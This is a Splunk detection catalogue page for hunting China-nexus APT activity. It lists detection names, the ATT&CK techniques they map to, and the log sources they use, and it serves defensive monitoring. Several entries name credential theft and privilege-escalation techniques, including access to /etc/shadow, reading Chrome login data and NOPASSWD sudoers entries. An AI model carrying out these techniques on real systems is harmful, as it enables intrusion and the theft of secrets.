Analytics Story: Nexus APT Threat Activity

Date: 2025-01-27 ID: 43f8062d-4da0-4f48-8cad-6a20e108961b Author: Teoderick Contreras, Splunk Product: Splunk Enterprise Security

Description

Leverage searches that allow you to detect and investigate unusual activities that might relate to Nexus, an advanced persistent threat (APT) group known for its stealth and strategic targeting of high-value sectors. Monitor for indicators such as spear-phishing campaigns, exploitation of zero-day vulnerabilities, and unauthorized lateral movement within your network. Investigate anomalous data exfiltration, encrypted communications, and behaviors aligning with their known tactics, techniques, and procedures (TTPs). Combining threat intelligence with real-time monitoring helps identify and respond to Nexus APT activity, minimizing potential damage and data loss.

Why it matters

Chinese state-nexus threat actors are known to target the telecommunications and technology sectors in multiple countries, including the US, to maintain sustained access as well as conduct espionage. Compromised entities in either sector represent potential supply chain vectors of concern to Splunk, although telecommunications entities are a more pervasive and acute concern in this regard. These actors are also known to broadly target unpatched routers, switches and other edge devices across various sectors. Given these threats, Splunk Threat Intelligence (TI) undertook a detailed investigation into China-nexus tactics and techniques that could be used in attempts to compromise Splunk. This report is the result of that investigation, detailing noteworthy behaviors and tools employed by China-nexus targeted intrusion actors.

Detections

Name ▲▼	Technique ▲▼	Type ▲▼
Any Powershell DownloadFile	PowerShell, Ingress Tool Transfer	TTP
Detect Renamed PSExec	Service Execution	Hunting
Detect Renamed WinRAR	Archive via Utility	Hunting
Executables Or Script Creation In Suspicious Path	Masquerading	Anomaly
Linux Auditd File Permission Modification Via Chmod	Linux and Mac File and Directory Permissions Modification	Anomaly
Linux Auditd Nopasswd Entry In Sudoers File	Sudo and Sudo Caching	Anomaly
Linux Auditd Possible Access To Credential Files	/etc/passwd and /etc/shadow	Anomaly
Linux Auditd Possible Access To Sudoers File	Sudo and Sudo Caching	Anomaly
Linux Auditd Preload Hijack Library Calls	Dynamic Linker Hijacking	TTP
Linux Common Process For Elevation Control	Setuid and Setgid	Hunting
Linux File Creation In Init Boot Directory	RC Scripts	Anomaly
Linux Iptables Firewall Modification	Disable or Modify System Firewall	Anomaly
Linux NOPASSWD Entry In Sudoers File	Sudo and Sudo Caching	Anomaly
Linux Possible Access To Credential Files	/etc/passwd and /etc/shadow	Anomaly
Linux Possible Access To Sudoers File	Sudo and Sudo Caching	Anomaly
Linux Preload Hijack Library Calls	Dynamic Linker Hijacking	TTP
Linux Sudoers Tmp File Creation	Sudo and Sudo Caching	Anomaly
Malicious PowerShell Process - Execution Policy Bypass	PowerShell	Anomaly
Non Chrome Process Accessing Chrome Default Dir	Credentials from Web Browsers	Anomaly
PowerShell 4104 Hunting	PowerShell	Hunting
Registry Keys Used For Persistence	Registry Run Keys / Startup Folder	TTP
Remote Process Instantiation via WMI	Windows Management Instrumentation	TTP
Scheduled Task Deleted Or Created via CMD	Scheduled Task	TTP
Suspicious Regsvr32 Register Suspicious Path	Regsvr32	TTP
Suspicious Scheduled Task from Public Directory	Scheduled Task	Anomaly
Windows Access Token Manipulation SeDebugPrivilege	Create Process with Token	Anomaly
Windows Archive Collected Data via Rar	Archive via Utility	Anomaly
Windows Credentials from Password Stores Chrome LocalState Access	Query Registry	Anomaly
Windows Credentials from Password Stores Chrome Login Data Access	Query Registry	Anomaly
Windows Curl Download to Suspicious Path	Ingress Tool Transfer	TTP
Windows Replication Through Removable Media	Replication Through Removable Media	TTP
Windows Service Created with Suspicious Service Path	Service Execution	TTP
Windows Service Creation Using Registry Entry	Services Registry Permissions Weakness	Anomaly
Windows Unsigned DLL Side-Loading	DLL Side-Loading	Anomaly
Windows Unsigned DLL Side-Loading In Same Process Path	DLL Side-Loading	TTP
Windows Unsigned MS DLL Side-Loading	DLL Side-Loading, Boot or Logon Autostart Execution	Anomaly
WinEvent Scheduled Task Created to Spawn Shell	Scheduled Task	TTP
WinEvent Scheduled Task Created Within Public Path	Scheduled Task	TTP
Detect Large Outbound ICMP Packets	Non-Application Layer Protocol	TTP

Data Sources

Name ▲▼	Platform ▲▼	Sourcetype ▲▼	Source ▲▼
CrowdStrike ProcessRollup2	N/A	`crowdstrike:events:sensor`	`crowdstrike`
Linux Auditd Execve	Linux	`linux:audit`	`/var/log/audit/audit.log`
Linux Auditd Path	Linux	`linux:audit`	`/var/log/audit/audit.log`
Linux Auditd Proctitle	Linux	`linux:audit`	`/var/log/audit/audit.log`
Palo Alto Network Traffic	Network	`pan:traffic`	`screenconnect_palo_traffic`
Powershell Script Block Logging 4104	Windows	`xmlwineventlog`	`XmlWinEventLog:Microsoft-Windows-PowerShell/Operational`
Sysmon EventID 1	Windows	`xmlwineventlog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
Sysmon EventID 11	Windows	`xmlwineventlog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
Sysmon EventID 13	Windows	`xmlwineventlog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
Sysmon EventID 7	Windows	`xmlwineventlog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
Sysmon for Linux EventID 1	Linux	`sysmon:linux`	`Syslog:Linux-Sysmon/Operational`
Sysmon for Linux EventID 11	Linux	`sysmon:linux`	`Syslog:Linux-Sysmon/Operational`
Windows Event Log Security 4663	Windows	`xmlwineventlog`	`XmlWinEventLog:Security`
Windows Event Log Security 4688	Windows	`xmlwineventlog`	`XmlWinEventLog:Security`
Windows Event Log Security 4698	Windows	`xmlwineventlog`	`XmlWinEventLog:Security`
Windows Event Log Security 4703	Windows	`xmlwineventlog`	`XmlWinEventLog:Security`
Windows Event Log System 7045	Windows	`xmlwineventlog`	`XmlWinEventLog:System`

References

Source: GitHub | Version: 1